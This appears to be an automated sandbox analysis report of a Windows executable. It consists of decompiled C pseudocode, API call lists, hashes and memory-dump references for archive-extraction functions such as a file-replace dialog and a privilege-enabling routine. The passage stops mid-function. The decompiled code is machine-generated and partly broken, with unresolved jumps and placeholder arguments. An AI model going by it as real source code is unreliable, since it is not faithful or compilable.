                                                                            • Instruction ID: 70c1fb0b947b78836b490dcf365a5119f2a5d9ddeacf3f8150debfd86d1398f5
                                                                            • Opcode Fuzzy Hash: 2dae7965357db39d73c8d1089937e15b4173d90e924fdc138782c3256ecf4e46
                                                                            • Instruction Fuzzy Hash: 47B012D9258801FD310D62447F02E36131CC4F2B1C330802FF002D48409F41ED010032
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 22%
                                                                            			E001AD1D8() {
                                                                            				void* _t2;
                                                                            				void* _t3;
                                                                            				void* _t6;
                                                                            				void* _t7;
                                                                            				void* _t8;
                                                                            
                                                                            				_push(0x1cab6c); // executed
                                                                            				E001AD53A(_t2, _t3, _t6, _t7, _t8); // executed
                                                                            				goto __eax;
                                                                            			}









                                                                            APIs
                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001AD1B6
                                                                              • Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
                                                                              • Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                            • String ID:
                                                                            • API String ID: 1269201914-0
                                                                            • Opcode ID: 4c55a37e67e17735321ed805c2a032d617fca8769ad2d5ef2409442a3d5e116b
                                                                            • Instruction ID: d52369c57b1e040c7f5ea6ff4e47a0a392b467c3ce9f3f733923b4469a40393d
                                                                            • Opcode Fuzzy Hash: 4c55a37e67e17735321ed805c2a032d617fca8769ad2d5ef2409442a3d5e116b
                                                                            • Instruction Fuzzy Hash: 22A0118EAA8802BC300E2200BC02E3A022CC8E2B28BB0880EF00380880AA80AE000032
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 22%
                                                                            			E001AD1F6() {
                                                                            				void* _t2;
                                                                            				void* _t3;
                                                                            				void* _t6;
                                                                            				void* _t7;
                                                                            				void* _t8;
                                                                            
                                                                            				_push(0x1cab6c); // executed
                                                                            				E001AD53A(_t2, _t3, _t6, _t7, _t8); // executed
                                                                            				goto __eax;
                                                                            			}









                                                                            APIs
                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001AD1B6
                                                                              • Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
                                                                              • Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                            • String ID:
                                                                            • API String ID: 1269201914-0
                                                                            • Opcode ID: 8bece1b0922af4ae4e2dd42c2b5b441a6e28fdb0a5572d449c2642eee4b2878e
                                                                            • Instruction ID: d52369c57b1e040c7f5ea6ff4e47a0a392b467c3ce9f3f733923b4469a40393d
                                                                            • Opcode Fuzzy Hash: 8bece1b0922af4ae4e2dd42c2b5b441a6e28fdb0a5572d449c2642eee4b2878e
                                                                            • Instruction Fuzzy Hash: 22A0118EAA8802BC300E2200BC02E3A022CC8E2B28BB0880EF00380880AA80AE000032
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 22%
                                                                            			E001AD1EC() {
                                                                            				void* _t2;
                                                                            				void* _t3;
                                                                            				void* _t6;
                                                                            				void* _t7;
                                                                            				void* _t8;
                                                                            
                                                                            				_push(0x1cab6c); // executed
                                                                            				E001AD53A(_t2, _t3, _t6, _t7, _t8); // executed
                                                                            				goto __eax;
                                                                            			}









                                                                            APIs
                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001AD1B6
                                                                              • Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
                                                                              • Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                            • String ID:
                                                                            • API String ID: 1269201914-0
                                                                            • Opcode ID: 8acb37a3f5016f95249460b727bbe4c98e3e26379c1721efd190e4bc1e0788df
                                                                            • Instruction ID: d52369c57b1e040c7f5ea6ff4e47a0a392b467c3ce9f3f733923b4469a40393d
                                                                            • Opcode Fuzzy Hash: 8acb37a3f5016f95249460b727bbe4c98e3e26379c1721efd190e4bc1e0788df
                                                                            • Instruction Fuzzy Hash: 22A0118EAA8802BC300E2200BC02E3A022CC8E2B28BB0880EF00380880AA80AE000032
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 22%
                                                                            			E001AD200() {
                                                                            				void* _t2;
                                                                            				void* _t3;
                                                                            				void* _t6;
                                                                            				void* _t7;
                                                                            				void* _t8;
                                                                            
                                                                            				_push(0x1cab6c); // executed
                                                                            				E001AD53A(_t2, _t3, _t6, _t7, _t8); // executed
                                                                            				goto __eax;
                                                                            			}









                                                                            APIs
                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001AD1B6
                                                                              • Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
                                                                              • Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                            • String ID:
                                                                            • API String ID: 1269201914-0
                                                                            • Opcode ID: 917a45ccd62025bb54a03db36a61e3cfb965ed95a383c234997eefeac7502d49
                                                                            • Instruction ID: d52369c57b1e040c7f5ea6ff4e47a0a392b467c3ce9f3f733923b4469a40393d
                                                                            • Opcode Fuzzy Hash: 917a45ccd62025bb54a03db36a61e3cfb965ed95a383c234997eefeac7502d49
                                                                            • Instruction Fuzzy Hash: 22A0118EAA8802BC300E2200BC02E3A022CC8E2B28BB0880EF00380880AA80AE000032
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 22%
                                                                            			E001AD22F() {
                                                                            				void* _t2;
                                                                            				void* _t3;
                                                                            				void* _t6;
                                                                            				void* _t7;
                                                                            				void* _t8;
                                                                            
                                                                            				_push(0x1cab8c); // executed
                                                                            				E001AD53A(_t2, _t3, _t6, _t7, _t8); // executed
                                                                            				goto __eax;
                                                                            			}









                                                                            APIs
                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001AD217
                                                                              • Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
                                                                              • Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                            • String ID:
                                                                            • API String ID: 1269201914-0
                                                                            • Opcode ID: d04fcae44001669a6031013bd84c36ecdfc877698870e6d3efd8e5531314f520
                                                                            • Instruction ID: dbb9231b7c0c1682e6da34049b4033e088b236be586cb536911e02d80bbb3cd2
                                                                            • Opcode Fuzzy Hash: d04fcae44001669a6031013bd84c36ecdfc877698870e6d3efd8e5531314f520
                                                                            • Instruction Fuzzy Hash: 04A011CE2A8802BC300AA280BC02F3A032EC8E2B38330880EF00380880AA80EE000032
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 22%
                                                                            			E001AD225() {
                                                                            				void* _t2;
                                                                            				void* _t3;
                                                                            				void* _t6;
                                                                            				void* _t7;
                                                                            				void* _t8;
                                                                            
                                                                            				_push(0x1cab8c); // executed
                                                                            				E001AD53A(_t2, _t3, _t6, _t7, _t8); // executed
                                                                            				goto __eax;
                                                                            			}









                                                                            APIs
                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001AD217
                                                                              • Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
                                                                              • Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                            • String ID:
                                                                            • API String ID: 1269201914-0
                                                                            • Opcode ID: 58d015686cee3b03f9ed35ae41875dee8bb862b0b146f785248f5c68016056de
                                                                            • Instruction ID: dbb9231b7c0c1682e6da34049b4033e088b236be586cb536911e02d80bbb3cd2
                                                                            • Opcode Fuzzy Hash: 58d015686cee3b03f9ed35ae41875dee8bb862b0b146f785248f5c68016056de
                                                                            • Instruction Fuzzy Hash: 04A011CE2A8802BC300AA280BC02F3A032EC8E2B38330880EF00380880AA80EE000032
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E00199BD6(void* __ecx) {
                                                                            				int _t2;
                                                                            
                                                                            				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
                                                                            				asm("sbb eax, eax");
                                                                            				return  ~(_t2 - 1) + 1;
                                                                            			}




                                                                            0x00199bd9
                                                                            0x00199be2
                                                                            0x00199be5

                                                                            APIs
                                                                            • SetEndOfFile.KERNELBASE(?,00198F33,?,?,-00001960), ref: 00199BD9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: File
                                                                            • String ID:
                                                                            • API String ID: 749574446-0
                                                                            • Opcode ID: 76f65b52135f8f0095da4a4e3a5f5201b60f41c68517f392ec7f3e21feafd8a2
                                                                            • Instruction ID: fb8f19db69907e483ee9f9338afb3fc2afceb6f302ededcd6aba84ba2c5ed93b
                                                                            • Opcode Fuzzy Hash: 76f65b52135f8f0095da4a4e3a5f5201b60f41c68517f392ec7f3e21feafd8a2
                                                                            • Instruction Fuzzy Hash: C1B011300A000A8B8E002B30CC088283E22EB2230A30082B0B003CA0A0CF22C023AA00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E001A9A8D(WCHAR* _a4) {
                                                                            				signed int _t2;
                                                                            
                                                                            				_t2 = SetCurrentDirectoryW(_a4); // executed
                                                                            				asm("sbb eax, eax");
                                                                            				return  ~( ~_t2);
                                                                            			}




                                                                            0x001a9a91
                                                                            0x001a9a99
                                                                            0x001a9a9d

                                                                            APIs
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,001A9CE4,C:\Users\user\Desktop,00000000,001D85FA,00000006), ref: 001A9A91
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CurrentDirectory
                                                                            • String ID:
                                                                            • API String ID: 1611563598-0
                                                                            • Opcode ID: b7fca6cb39fa1a3c2d02b08291a307ff15dd2b1055842b9cf9bffb1f47a1be6d
                                                                            • Instruction ID: 1607a875bf0647e5f1ddaf988d3db1b9959ee901f6ccf52a2fda66611764605e
                                                                            • Opcode Fuzzy Hash: b7fca6cb39fa1a3c2d02b08291a307ff15dd2b1055842b9cf9bffb1f47a1be6d
                                                                            • Instruction Fuzzy Hash: C6A01230194006478A000B30CC09C157A515760B02F008620B102C00A0CB30C850A500
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            C-Code - Quality: 60%
                                                                            			E001AAFB9(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
                                                                            				struct _FILETIME _v0;
                                                                            				struct _SYSTEMTIME _v12;
                                                                            				struct _SYSTEMTIME _v16;
                                                                            				struct _FILETIME _v24;
                                                                            				void* _t73;
                                                                            				void* _t136;
                                                                            				long _t137;
                                                                            				void* _t141;
                                                                            				void* _t142;
                                                                            				void* _t143;
                                                                            				void* _t144;
                                                                            				void* _t145;
                                                                            				signed short _t148;
                                                                            				void* _t151;
                                                                            				intOrPtr _t152;
                                                                            				signed int _t153;
                                                                            				signed int _t157;
                                                                            				struct HWND__* _t159;
                                                                            				intOrPtr _t162;
                                                                            				void* _t163;
                                                                            				int _t166;
                                                                            				int _t169;
                                                                            				void* _t173;
                                                                            				void* _t177;
                                                                            				void* _t179;
                                                                            
                                                                            				_t156 = __edx;
                                                                            				_t151 = __ecx;
                                                                            				E001AD940();
                                                                            				_t148 = _a6748;
                                                                            				_t162 = _a6744;
                                                                            				_t159 = _a6740;
                                                                            				if(E001912D7(__edx, _t159, _t162, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
                                                                            					_t163 = _t162 - 0x110;
                                                                            					if(_t163 == 0) {
                                                                            						SetFocus(GetDlgItem(_t159, 0x6c));
                                                                            						E0019FAB1( &_a2640, _a6752, 0x800);
                                                                            						E0019BA19( &_a2628,  &_a2628, 0x800);
                                                                            						SetDlgItemTextW(_t159, 0x65,  &_a2616);
                                                                            						 *0x1cdf00( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
                                                                            						SendDlgItemMessageW(_t159, 0x66, 0x170, _a1904, 0);
                                                                            						_t173 = FindFirstFileW( &_a2596,  &_a288);
                                                                            						if(_t173 != 0xffffffff) {
                                                                            							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
                                                                            							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
                                                                            							_push(0x32);
                                                                            							_push( &_a12);
                                                                            							_push(0);
                                                                            							_push( &_v12);
                                                                            							_t166 = 2;
                                                                            							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
                                                                            							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
                                                                            							_push( &_a12);
                                                                            							_push( &_a112);
                                                                            							E00193E41( &_a900, 0x200, L"%s %s %s", E0019DA42(_t151, 0x99));
                                                                            							_t179 = _t177 + 0x18;
                                                                            							SetDlgItemTextW(_t159, 0x6a,  &_a900);
                                                                            							FindClose(_t173);
                                                                            							if((_a308 & 0x00000010) == 0) {
                                                                            								_push(0x32);
                                                                            								_push( &_a212);
                                                                            								_push(0);
                                                                            								_pop(0);
                                                                            								asm("adc eax, ebp");
                                                                            								_push(_a340);
                                                                            								_push(0 + _a344);
                                                                            								E001A9D99();
                                                                            								_push(E0019DA42(0 + _a344, 0x98));
                                                                            								E00193E41( &_a884, 0x200, L"%s %s",  &_a192);
                                                                            								_t179 = _t179 + 0x14;
                                                                            								SetDlgItemTextW(_t159, 0x68,  &_a884);
                                                                            							}
                                                                            							SendDlgItemMessageW(_t159, 0x67, 0x170, _a1928, 0);
                                                                            							_t152 =  *0x1d75f4; // 0x0
                                                                            							E001A082F(_t152, _t156,  &_a4);
                                                                            							FileTimeToLocalFileTime( &_v0,  &_v24);
                                                                            							FileTimeToSystemTime( &_v24,  &_v16);
                                                                            							GetTimeFormatW(0x400, _t166,  &_v16, 0,  &_a8, 0x32);
                                                                            							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
                                                                            							_push( &_a8);
                                                                            							_push( &_a108);
                                                                            							E00193E41( &_a896, 0x200, L"%s %s %s", E0019DA42(_t152, 0x99));
                                                                            							_t177 = _t179 + 0x18;
                                                                            							SetDlgItemTextW(_t159, 0x6b,  &_a896);
                                                                            							_t153 =  *0x1ece14;
                                                                            							_t157 =  *0x1ece10;
                                                                            							if((_a304 & 0x00000010) == 0 || (_t157 | _t153) != 0) {
                                                                            								E001A9D99(_t157, _t153,  &_a212, 0x32);
                                                                            								_push(E0019DA42(_t153, 0x98));
                                                                            								E00193E41( &_a884, 0x200, L"%s %s",  &_a192);
                                                                            								_t177 = _t177 + 0x14;
                                                                            								SetDlgItemTextW(_t159, 0x69,  &_a884);
                                                                            							}
                                                                            						}
                                                                            						L27:
                                                                            						_t73 = 0;
                                                                            						L28:
                                                                            						return _t73;
                                                                            					}
                                                                            					if(_t163 != 1) {
                                                                            						goto L27;
                                                                            					}
                                                                            					_t169 = 2;
                                                                            					_t136 = (_t148 & 0x0000ffff) - _t169;
                                                                            					if(_t136 == 0) {
                                                                            						L11:
                                                                            						_push(6);
                                                                            						L12:
                                                                            						_pop(_t169);
                                                                            						L13:
                                                                            						_t137 = SendDlgItemMessageW(_t159, 0x66, 0x171, 0, 0);
                                                                            						if(_t137 != 0) {
                                                                            							 *0x1cdf4c(_t137);
                                                                            						}
                                                                            						EndDialog(_t159, _t169);
                                                                            						goto L1;
                                                                            					}
                                                                            					_t141 = _t136 - 0x6a;
                                                                            					if(_t141 == 0) {
                                                                            						_t169 = 0;
                                                                            						goto L13;
                                                                            					}
                                                                            					_t142 = _t141 - 1;
                                                                            					if(_t142 == 0) {
                                                                            						_t169 = 1;
                                                                            						goto L13;
                                                                            					}
                                                                            					_t143 = _t142 - 1;
                                                                            					if(_t143 == 0) {
                                                                            						_push(4);
                                                                            						goto L12;
                                                                            					}
                                                                            					_t144 = _t143 - 1;
                                                                            					if(_t144 == 0) {
                                                                            						goto L13;
                                                                            					}
                                                                            					_t145 = _t144 - 1;
                                                                            					if(_t145 == 0) {
                                                                            						_push(3);
                                                                            						goto L12;
                                                                            					}
                                                                            					if(_t145 != 1) {
                                                                            						goto L27;
                                                                            					}
                                                                            					goto L11;
                                                                            				}
                                                                            				L1:
                                                                            				_t73 = 1;
                                                                            				goto L28;
                                                                            			}




























                                                                            0x001ab052
                                                                            0x001ab055
                                                                            0x001ab055
                                                                            0x001ab05d
                                                                            0x00000000
                                                                            0x001ab05d
                                                                            0x001ab01b
                                                                            0x001ab01e
                                                                            0x001ab072
                                                                            0x00000000
                                                                            0x001ab072
                                                                            0x001ab020
                                                                            0x001ab023
                                                                            0x001ab06f
                                                                            0x00000000
                                                                            0x001ab06f
                                                                            0x001ab025
                                                                            0x001ab028
                                                                            0x001ab069
                                                                            0x00000000
                                                                            0x001ab069
                                                                            0x001ab02a
                                                                            0x001ab02d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001ab02f
                                                                            0x001ab032
                                                                            0x001ab065
                                                                            0x00000000
                                                                            0x001ab065
                                                                            0x001ab037
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001ab037
                                                                            0x001aaff8
                                                                            0x001aaffa
                                                                            0x00000000

                                                                            APIs
                                                                              • Part of subcall function 001912D7: GetDlgItem.USER32(00000000,00003021), ref: 0019131B
                                                                              • Part of subcall function 001912D7: SetWindowTextW.USER32(00000000,001C22E4), ref: 00191331
                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 001AB04A
                                                                            • EndDialog.USER32(?,00000006), ref: 001AB05D
                                                                            • GetDlgItem.USER32(?,0000006C), ref: 001AB079
                                                                            • SetFocus.USER32(00000000), ref: 001AB080
                                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 001AB0C0
                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 001AB0F3
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 001AB109
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001AB127
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 001AB137
                                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 001AB154
                                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 001AB172
                                                                            • _swprintf.LIBCMT ref: 001AB1A2
                                                                              • Part of subcall function 00193E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00193E54
                                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 001AB1B5
                                                                            • FindClose.KERNEL32(00000000), ref: 001AB1B8
                                                                            • _swprintf.LIBCMT ref: 001AB213
                                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 001AB226
                                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 001AB23C
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 001AB25C
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 001AB26C
                                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 001AB286
                                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 001AB29E
                                                                            • _swprintf.LIBCMT ref: 001AB2CF
                                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 001AB2E2
                                                                            • _swprintf.LIBCMT ref: 001AB332
                                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 001AB345
                                                                              • Part of subcall function 001A9D99: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 001A9DBF
                                                                              • Part of subcall function 001A9D99: GetNumberFormatW.KERNEL32 ref: 001A9E0E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                            • API String ID: 797121971-1840816070
                                                                            • Opcode ID: d13bb805db80b288114a06e4f04e7eab0e0edf2fb38e0a4bf1d9b8d943a280a6
                                                                            • Instruction ID: 57a4563cf42c13b8728460467a37082d2de17773b8cc7e6521440e90e31182b4
                                                                            • Opcode Fuzzy Hash: d13bb805db80b288114a06e4f04e7eab0e0edf2fb38e0a4bf1d9b8d943a280a6
                                                                            • Instruction Fuzzy Hash: 9191C576248348BFD631DBA0DD89FFB7BACEB8AB00F044819F645D2482D775E6058762
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 83%
                                                                            			E00196FC6(void* __edx) {
                                                                            				void* __esi;
                                                                            				signed int _t111;
                                                                            				signed int _t113;
                                                                            				void* _t116;
                                                                            				int _t118;
                                                                            				intOrPtr _t121;
                                                                            				signed int _t139;
                                                                            				int _t145;
                                                                            				void* _t182;
                                                                            				void* _t185;
                                                                            				void* _t190;
                                                                            				short _t191;
                                                                            				void* _t197;
                                                                            				void* _t202;
                                                                            				void* _t203;
                                                                            				void* _t222;
                                                                            				void* _t223;
                                                                            				intOrPtr _t224;
                                                                            				intOrPtr _t226;
                                                                            				void* _t228;
                                                                            				WCHAR* _t229;
                                                                            				intOrPtr _t233;
                                                                            				short _t237;
                                                                            				void* _t238;
                                                                            				intOrPtr _t239;
                                                                            				short _t241;
                                                                            				void* _t242;
                                                                            				void* _t244;
                                                                            				void* _t245;
                                                                            
                                                                            				_t223 = __edx;
                                                                            				E001AD870(E001C126D, _t242);
                                                                            				E001AD940();
                                                                            				 *((intOrPtr*)(_t242 - 0x18)) = 1;
                                                                            				if( *0x1d0043 == 0) {
                                                                            					E00197A15(L"SeRestorePrivilege");
                                                                            					E00197A15(L"SeCreateSymbolicLinkPrivilege");
                                                                            					 *0x1d0043 = 1;
                                                                            				}
                                                                            				_t199 = _t242 - 0x2c;
                                                                            				E00196ED7(_t242 - 0x2c, 0x1418);
                                                                            				_t197 =  *(_t242 + 0x10);
                                                                            				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
                                                                            				E0019FAB1(_t242 - 0x107c, _t197 + 0x1104, 0x800);
                                                                            				 *((intOrPtr*)(_t242 - 0x10)) = E001B2B33(_t242 - 0x107c);
                                                                            				_t232 = _t242 - 0x107c;
                                                                            				_t228 = _t242 - 0x207c;
                                                                            				_t111 = E001B4DA0(_t242 - 0x107c, L"\\??\\", 4);
                                                                            				_t245 = _t244 + 0x10;
                                                                            				asm("sbb al, al");
                                                                            				_t113 =  ~_t111 + 1;
